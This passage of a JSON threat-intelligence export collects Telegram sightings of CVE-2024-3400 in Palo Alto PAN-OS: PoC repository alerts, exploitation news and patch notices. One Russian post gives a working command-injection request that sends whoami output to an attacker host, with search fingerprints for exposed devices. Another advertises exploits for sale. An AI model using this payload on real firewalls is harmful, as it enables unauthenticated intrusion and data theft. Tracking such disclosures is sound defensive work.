CVE-2024-3400\nURL\uff1ahttps://github.com/stronglier/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-20T11:55:10.000000Z"}, {"uuid": "13522895-c1e5-4250-8011-dab708a07c2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7117", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aFinding Palo Alto devices vulnerable to CVE-2024-3400.\nURL\uff1ahttps://github.com/pwnj0hn/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-19T06:42:26.000000Z"}, {"uuid": "92c35645-f233-4b48-b0e2-d4a6bcdfe181", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-34004", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9219", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-34004\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: In a shared hosting environment that has been misconfigured to allow access to other users' content, a Moodle user with both access to restore wiki modules and direct access to the web server outside of the Moodle webroot could execute a local file include.\n\ud83d\udccf Published: 2024-05-31T20:23:02.481Z\n\ud83d\udccf Modified: 2025-03-27T21:12:35.694Z\n\ud83d\udd17 References:\n1. https://moodle.org/mod/forum/discuss.php?d=458393", "creation_timestamp": "2025-03-27T21:27:44.000000Z"}, {"uuid": "68c19753-0b1d-4dbe-9bfb-b5b2428cf506", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7130", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPython exploit and checker script for CVE-2024-3400 Palo Alto Command Injection and Arbitrary File Creation\nURL\uff1ahttps://github.com/Kr0ff/cve-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-21T12:39:59.000000Z"}, {"uuid": "c6c119a4-ed73-4283-ac7c-f616217329cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7159", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSimple honeypot for CVE-2024-3400 Palo Alto PAN-OS Command Injection Vulnerability\nURL\uff1ahttps://github.com/zam89/CVE-2024-3400-pot\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-24T14:25:55.000000Z"}, {"uuid": "2030e7ff-57fa-450d-8983-7d49f3a74923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/-AMVnSY6jDOojlnXSGqNnso0CPT7pe-b2HhnSTUmCsNWYZA", "content": "", "creation_timestamp": "2025-10-01T15:00:08.000000Z"}, {"uuid": "84b7f0e3-f7ee-4888-91a4-85ce3ed7fbcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/alexmakus/5282", "content": "\u043f\u0430\u0442\u0447\u0438 \u0432\u0447\u0435\u0440\u0430 \u043f\u043e\u0437\u0434\u043d\u043e \u043d\u043e\u0447\u044c\u044e \u0432\u044b\u043b\u043e\u0436\u0438\u043b\u0438 \n\nhttps://unit42.paloaltonetworks.com/cve-2024-3400/", "creation_timestamp": "2024-04-15T15:34:14.000000Z"}, {"uuid": "a591fd68-2108-4ef3-9c0a-3a50a8ffd826", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/BleepingComputer/19795", "content": "\u200aPalo Alto Networks zero-day exploited since March to backdoor firewalls\n\nSuspected state-sponsored hackers have been exploiting a zero-day vulnerability in Palo Alto Networks firewalls tracked as CVE-2024-3400 since March 26, using the compromised devices to breach internal networks, steal data and credentials. [...]\n\nhttps://www.bleepingcomputer.com/news/security/palo-alto-networks-zero-day-exploited-since-march-to-backdoor-firewalls/", "creation_timestamp": "2024-04-13T13:23:57.000000Z"}, {"uuid": "172acca5-d9a6-454a-8d39-55b319fdb876", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/BleepingComputer/19835", "content": "\u200a22,500 Palo Alto firewalls \"possibly vulnerable\" to ongoing attacks\n\nApproximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection vulnerability that has been actively exploited in attacks since at least March 26, 2024. [...]\n\nhttps://www.bleepingcomputer.com/news/security/22-500-palo-alto-firewalls-possibly-vulnerable-to-ongoing-attacks/", "creation_timestamp": "2024-04-19T19:35:04.000000Z"}, {"uuid": "f0ea9531-2aaa-4a6a-b416-e5565c87a243", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/cyberbannews_ir/11559", "content": "\ud83e\ude99 \u0627\u0635\u0644\u0627\u062d\u0627\u062a \u067e\u0627\u0644\u0648 \u0622\u0644\u062a\u0648 \u0628\u0631\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648\u0632 \u0635\u0641\u0631\n\n\ud83d\udd3a\u0647\u0645\u0627\u0646\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u06cc\u06a9 \u0627\u0637\u0644\u0627\u0639\u06cc\u0647 \u0641\u0648\u0631\u06cc \u062f\u0631\u0628\u0627\u0631\u0647 \u0627\u06cc\u0646 \u0628\u0627\u06af \u0627\u0645\u0646\u06cc\u062a\u06cc \u062f\u0631 \u0635\u0628\u062d \u062c\u0645\u0639\u0647 \u0648\u0639\u062f\u0647 \u062f\u0627\u062f\u0647 \u0634\u062f\u0647 \u0628\u0648\u062f\u060c \u0631\u0641\u0639 \u0641\u0648\u0631\u06cc \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0628\u0631\u0686\u0633\u0628 CVE-2024-3400\u060c \u0631\u0648\u0632 \u06cc\u06a9\u0634\u0646\u0628\u0647 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f.\n\n\ud83d\udd3b\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0631\u0648\u0632 \u0635\u0641\u0631 \u062f\u0627\u0631\u0627\u06cc \u0628\u0627\u0644\u0627\u062a\u0631\u06cc\u0646 \u0646\u0645\u0631\u0647 \u0645\u0645\u06a9\u0646 \u0627\u0632 10 \u0627\u0633\u062a.\n\n\u2764\ufe0f \u06af\u0632\u0627\u0631\u0634 \u06a9\u0627\u0645\u0644 \n\n#\u0622\u0633\u06cc\u0628_\u067e\u0630\u06cc\u0631\u06cc #\u0627\u0645\u0646\u06cc\u062a_\u0633\u0627\u06cc\u0628\u0631\u06cc #\u0627\u0645\u0646\u06cc\u062a\n\n\ud83e\udda0 @cyberbannews_ir", "creation_timestamp": "2024-04-17T05:19:20.000000Z"}, {"uuid": "3aab5af2-b59f-4127-8c66-4b4c436f4692", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/223", "content": "\u0414\u0435\u0442\u0430\u043b\u0438 \u043e\u0447\u0435\u0440\u0435\u0434\u043d\u043e\u0439 RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-3400 (\u043e\u0446\u0435\u043d\u043a\u0430 \u043f\u043e CVSS=10.0) \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e \u0432\u044b\u0441\u043e\u043a\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u0431\u044b\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u043f\u0440\u043e\u0448\u043b\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435. \u041d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u043e\u0442\u043b\u0438\u0447\u0438\u043b\u0441\u044f Palo Alto Networks - \u043e\u0434\u0438\u043d \u0438\u0437 \u043c\u0438\u0440\u043e\u0432\u044b\u0445 \u043b\u0438\u0434\u0435\u0440\u043e\u0432 \u0432 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435 \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f 0day RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 SSLVPN-\u0440\u0435\u0448\u0435\u043d\u0438\u044f GlobalProtect Gateway/Portal PAN-OS \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 Operation MidnightEclipse \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c\u0438 \u0438\u0437 Volexity. \n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u043c\u0443 \u043d\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c RCE:\n\n\u2705 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Arbitrary File Write \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0438\u0441\u0430\u0442\u044c \u0432 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e \u0441 \u043b\u043e\u0433\u0430\u043c\u0438 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 /opt/panlogs/tmp/device_telemetry/ \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Path Traversal \u0432 \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0438 Cookie\nCookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}x1.outboundhost.com`;\n\u2705 \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Command injection \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u043a\u0430\u0441\u0442\u043e\u043c\u043d\u043e\u0439 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0438 pansys.py, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 curl \u0434\u043b\u044f \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0442\u0435\u043b\u0435\u043c\u0435\u0442\u0440\u0438\u0438 \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430 \u043f\u043e cron, \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u043c\u043e\u0434\u0443\u043b\u044f subprocess.Popen()\n\u2705 \u0411\u0430\u0439\u043f\u0430\u0441 \u043f\u0440\u043e\u0431\u0435\u043b\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e IFS (Internal Field Separator)\n\nPOST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: target.com\nCookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}attacker.fun?test=$(whoami)`;\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n\n\u0412 \u0420\u043e\u0441\u0441\u0438\u0438 \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u043c Shodan \u0432\u0441\u0435\u0433\u043e 256 \u0445\u043e\u0441\u0442\u043e\u0432 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 PAN-OS\ud83d\ude0e, \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c\u0441\u044f ASAP\n\n\u2699\ufe0f POC: https://github.com/0x0d3ad/CVE-2024-3400\n\ud83d\udd0e Shodan: http.html_hash:-1303565546 \n\ud83d\udd0e Censys: services.http.response.body_hash=\"sha1:28f1cf539f855fff3400f6199f8912908f51e1e1\n\ud83d\udd0e Nuclei template: https://github.com/projectdiscovery/nuclei-templates/blob/b8bbbc5ed5ddbff87fbde649bd2f8a9a576b90c3/http/cves/2024/CVE-2024-3400.yaml\n\ud83e\udeb2 \u0423\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u041f\u041e: PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1\n\u2705 \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438: \u041f\u0430\u0442\u0447\u0438 \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b", "creation_timestamp": "2024-04-18T07:32:10.000000Z"}, {"uuid": "c09a4b9a-0981-4963-bfc7-9d85365f54ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7099", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400\nURL\uff1ahttps://github.com/0x0d3ad/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-17T19:13:01.000000Z"}, {"uuid": "758f4157-e747-4315-97a4-dbeff4f6b356", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7038", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-3400 Checker\nURL\uff1ahttps://github.com/shamo0/CVE-2024-3400\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-04-13T11:32:44.000000Z"}, {"uuid": "86b03648-b16e-41dd-8f4c-85ba74e069d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/alexmakus/5279", "content": "Palo Alto Networks \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043d\u043e\u0432\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0444\u0430\u0439\u0440\u0432\u043e\u043b\u043b\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0446\u0438\u044f\u043c\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Volexity \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f: \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u0438 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 10.0, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2024-3400, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0434\u043b\u044f \u0432\u0437\u043b\u043e\u043c\u0430 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0442\u0441\u044f \u043f\u0430\u0440\u043e\u043b\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430\u0447\u0430\u043b\u0430\u0441\u044c \u043f\u043e \u043c\u0435\u043d\u044c\u0448\u0435\u0439 \u043c\u0435\u0440\u0435 \u0441 26 \u043c\u0430\u0440\u0442\u0430, \u0441\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0438\u0437 Volexity, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0442 \u043d\u0430 UTA0218 \u043a\u0430\u043a \u043d\u0430 \"\u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u043f\u043e\u043d\u0441\u043e\u0440\u0430 \u0443\u0433\u0440\u043e\u0437,\" \u043d\u043e \u043f\u043e\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043a\u0430\u043a\u043e\u0435 \u0438\u043c\u0435\u043d\u043d\u043e \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e. \u041e\u0436\u0438\u0434\u0430\u0435\u0442\u0441\u044f, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0443\u0434\u0443\u0442 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b 14 \u0430\u043f\u0440\u0435\u043b\u044f \u2014 \u0442\u043e \u0435\u0441\u0442\u044c \u0441\u0435\u0433\u043e\u0434\u043d\u044f!\n\nhttps://security.paloaltonetworks.com/CVE-2024-3400", "creation_timestamp": "2024-04-15T01:22:30.000000Z"}, {"uuid": "8c9dafd6-c2f7-4724-a168-b422b98b7703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/QFeXN19RCZ7ZU-L3-ScgIhLCETkqrYIG0FyebohShsEE2g", "content": "", "creation_timestamp": "2024-04-15T11:33:04.000000Z"}, {"uuid": "10c0d7a9-a3d6-45b1-8dda-937c112491d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/zGrhgnPcydkCQZyljRF2nYG_j0EnR3_z6IsYJpBa-tBO0Z0", "content": "", "creation_timestamp": "2024-04-26T13:34:30.000000Z"}, {"uuid": "fe3c52d3-aa82-41c7-b60a-218c9957b5a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/0GdlWKHSLHl-Zdt8fK8R9G8fnazfU3EaGCfBzBhzUu1st2Q", "content": "", "creation_timestamp": "2024-04-20T08:43:41.000000Z"}, {"uuid": "4fa972a9-9347-4cdf-a535-52d0057dc1fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/t3orpIwYy1UCmQh3s9Mrt0-OTPiRGcZay2gpKiiTMQqV0Q", "content": "", "creation_timestamp": "2024-04-15T17:14:44.000000Z"}, {"uuid": "b6c9d1fe-4be6-40a3-8766-585d67c15c80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/8w9NbQQwPENxeJa6JTsco_zit2wdOp-mV6BJU7IzyyAcpA", "content": "", "creation_timestamp": "2024-04-26T15:42:02.000000Z"}, {"uuid": "47fbb72a-a238-44a0-a443-07bec0e82d07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/C3u8QjN9-7lzSNJ7Qu3Opmh4hhAH2TCJS3ZmcxICBQFQQg", "content": "", "creation_timestamp": "2024-04-20T11:36:23.000000Z"}, {"uuid": "f0f9cee7-1260-4675-914c-30488b102c45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "published-proof-of-concept", "source": "Telegram/rHhILOfh0DV2bQ6VnjEzYThbbbKKTLwIgW-oKlsxWIqTng", "content": "", "creation_timestamp": "2024-04-13T10:55:50.000000Z"}, {"uuid": "f2c70f16-4f71-4a0b-bdaa-fc910e15c637", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/CyperNews/78", "content": "\ud83d\udd3a\u0627\u0644\u062b\u063a\u0631\u0629 CVE-2024-3400 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 \u0646\u0636\u0627\u0645 \u062a\u0634\u063a\u064a\u0644 PAN-OS \u0627\u0644\u0645\u0633\u062a\u062e\u062f\u0645\u0629 \u0641\u064a \u0628\u0648\u0627\u0628\u0627\u062a GlobalProtect \u0644\u0634\u0631\u0643\u0629 Palo Alto Networks. \u064a\u0645\u0643\u0646 \u0644\u0644\u0645\u0647\u0627\u062c\u0645 \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u0631\u062d \u0628\u0647 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0644\u062a\u0646\u0641\u064a\u0630 \u0631\u0645\u0632 \u062a\u0639\u0633\u0641\u064a \u0628\u0627\u0645\u062a\u064a\u0627\u0632\u0627\u062a \u062c\u0630\u0631\u064a\u0629 \u0639\u0644\u0649 \u0627\u0644\u0645\u062f\u0627\u0641\u0639. \u0627\u0644\u062b\u063a\u0631\u0629 \u062a\u0624\u062b\u0631 \u0639\u0644\u0649 \u0628\u0639\u0636 \u0625\u0635\u062f\u0627\u0631\u0627\u062a PAN-OS \u0645\u062d\u062f\u062f\u0629\u060c \u0648\u062a\u062a\u0637\u0644\u0628 \u062a\u0643\u0648\u064a\u0646\u0627\u062a \u0645\u0639\u064a\u0646\u0629 \u0644\u0644\u0645\u064a\u0632\u0627\u062a. \u0645\u0646 \u0627\u0644\u0645\u062a\u0648\u0642\u0639 \u0625\u0635\u062f\u0627\u0631 \u0625\u0635\u0644\u0627\u062d\u0627\u062a \u0641\u064a 14 \u0623\u0628\u0631\u064a\u0644 2024.\n\n#CyperNews", "creation_timestamp": "2024-06-10T14:10:49.000000Z"}, {"uuid": "b61b24e2-9015-4b2f-a5fc-7fcfad514ba2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "seen", "source": "https://t.me/Hunt3rkill3rs1/53", "content": "\u041c\u044b \u043f\u0440\u043e\u0434\u0430\u0435\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b:\n\n+ Windows LPE (CVE-2024-26169), March 2024\n\n+ Microsoft Outlook RCE (CVE-2024-21413) - private and upgraded version (added suport for unauthenticated SMTP servers)\n\n+ GlobalProtect RCE (CVE-2024-3400)\n\n+ Fortinet FortiOS RCE (CVE-2024-21762)\n\n+ ScreenConnect RCE (CVE-2024-1709)\n\n+ Ivanti Exploit (CVE-2024-21893)\n\n+ Jenkins Exploit (CVE-2024-23897)\n\n+ JetBrains RCE (CVE-2024-27198)", "creation_timestamp": "2024-05-02T02:29:37.000000Z"}, {"uuid": "29abd806-5aed-4cc5-8373-db9835b0797f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "Telegram/g70z2OuW-yhF5TY3RerGs48uhgip9M-CBnzt1bQi3sOszyXG", "content": "", "creation_timestamp": "2024-07-23T18:30:59.000000Z"}, {"uuid": "c6a204a2-5f82-40b5-ab03-e0d2f2dec942", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-3400", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/5993", "content": "The Hacker News\nPalo Alto Networks Discloses More Details on Critical PAN-OS Flaw Under Attack\n\nPalo Alto Networks has shared more details of a critical security flaw impacting PAN-OS that&nbsp;has come under active exploitation&nbsp;in the wild&nbsp;by malicious actors.\nThe company described the vulnerability, tracked 